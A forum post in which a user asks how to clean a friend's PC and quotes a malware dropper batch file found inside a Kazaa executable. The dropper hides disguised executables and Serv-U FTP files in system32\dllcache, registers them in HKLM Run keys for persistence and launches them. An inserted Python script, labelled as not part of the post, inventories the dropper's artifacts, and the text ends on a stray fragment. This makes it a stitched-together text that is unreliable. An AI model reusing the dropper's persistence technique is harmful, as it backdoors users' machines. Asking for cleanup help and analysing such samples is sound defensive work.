Hey,
Just been to a friend's house to clean up his comp. After running Ad-Aware and removing 308 spy/adware applications,
I found this in a bat file hidden in his auto-executing Kazaa exe file.
After laughing and telling him he has been rooted...he responded with 'iv been what now'
Code:
@echo off
mkdir %SystemRoot%\system32\dllcache\I386
mkdir %systemroot%\system32\dllcache\I386\pax
copy svchost.exe %SystemRoot%\system32\dllcache
copy cygwin1.dll %SystemRoot%\system32\dllcache
copy TzoLibr.dll %SystemRoot%\system32\dllcache
copy libeay32.dll %SystemRoot%\system32\dllcache
copy SPOOLSVC.exe %SystemRoot%\system32\dllcache
copy ServUDaemon.ini %SystemRoot%\system32\dllcache
copy ogm.dll %SystemRoot%\system32\dllcache\I386\pax
del svchost.exe
del cygwin1.dll
del ogm.dll
del SPOOLSVC.exe
del TzoLibr.dll
del libeay32.dll
del ServUDaemon.ini
reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v System /t REG_SZ /d "%SystemRoot%\system32\dllcache\svchost.exe -b %SystemRoot%\system32\dllcache\I386\pax\ogm.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SystemData /t REG_SZ /d "%SystemRoot%\system32\dllcache\SPOOLSVC.exe" /f
call klr247.exe
del ogm.bat
cd %SystemRoot%\system32\dllcache
SPOOLSVC.exe
I have found all the files it copied as well as the directory and the registry keys and just wanted to know if it's OK to just delete it all. Is there anything else hidden in here that requires special attention?
Thanks.


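An added example, not part of the original post: a small Python parser that walks an excerpt of the batch file quoted above and lists what it leaves behind (directories, copied files, Run values), plus any program it launches without installing, here klr247.exe, whose effects the script itself does not show. The function name `inventory` and its output layout are assumptions of this example.

```python
import re
from ntpath import join, normcase

# Excerpt of the batch file quoted in the post above (not the full script).
DROPPER = r'''@echo off
mkdir %SystemRoot%\system32\dllcache\I386
mkdir %systemroot%\system32\dllcache\I386\pax
copy svchost.exe %SystemRoot%\system32\dllcache
copy SPOOLSVC.exe %SystemRoot%\system32\dllcache
copy ogm.dll %SystemRoot%\system32\dllcache\I386\pax
del svchost.exe
reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v System /t REG_SZ /d "%SystemRoot%\system32\dllcache\svchost.exe -b %SystemRoot%\system32\dllcache\I386\pax\ogm.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SystemData /t REG_SZ /d "%SystemRoot%\system32\dllcache\SPOOLSVC.exe" /f
call klr247.exe
del ogm.bat
cd %SystemRoot%\system32\dllcache
SPOOLSVC.exe
'''

REG_ADD = re.compile(r'reg add "([^"]+)" /v (\S+) .*?/d "([^"]+)"', re.I)

def inventory(script):
    """Return what the script leaves behind: dirs, files, Run values, unexplained programs."""
    found = {"dirs": [], "files": [], "run_values": [], "unexplained": []}
    launched = []
    for line in script.splitlines():
        words = line.split() or [""]          # blank lines match no branch below
        verb = words[0].lower()
        if verb == "mkdir":
            found["dirs"].append(words[1])
        elif verb == "copy":                  # copy <file> <destination directory>
            found["files"].append(join(words[2], words[1]))
        elif verb == "reg" and (m := REG_ADD.search(line)):
            found["run_values"].append(m.groups())   # (key, value name, command line)
        elif verb == "call":
            launched.append(words[1])
        elif len(words) == 1 and verb.endswith(".exe"):
            launched.append(words[0])         # bare executable name on its own line
    dropped = {normcase(f.rsplit("\\", 1)[-1]) for f in found["files"]}
    # Programs the script runs but never copies anywhere: their effects are not visible here.
    found["unexplained"] = [p for p in launched if normcase(p) not in dropped]
    return found

if __name__ == "__main__":
    for kind, items in inventory(DROPPER).items():
        print(kind, *items, sep="\n  ")
```
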


would allow him to replace the files.
